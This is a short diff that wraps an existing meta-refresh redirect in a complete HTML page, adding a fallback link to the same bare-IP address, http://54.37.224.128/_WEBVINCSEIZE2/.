--- a/index.html
+++ b/index.html
@@ -1,1 +1,10 @@
-<meta http-equiv="Refresh" content="0; url='http://54.37.224.128/_WEBVINCSEIZE2/'" />
+<!DOCTYPE html>
+<html>
+  <head>
+    <meta http-equiv="Refresh" content="0; url='http://54.37.224.128/_WEBVINCSEIZE2/'" />
+  </head>
+  <body>
+    <p>Please follow <a href="http://54.37.224.128/_WEBVINCSEIZE2/">this link</a>.</p>
+  </body>
+</html>
+
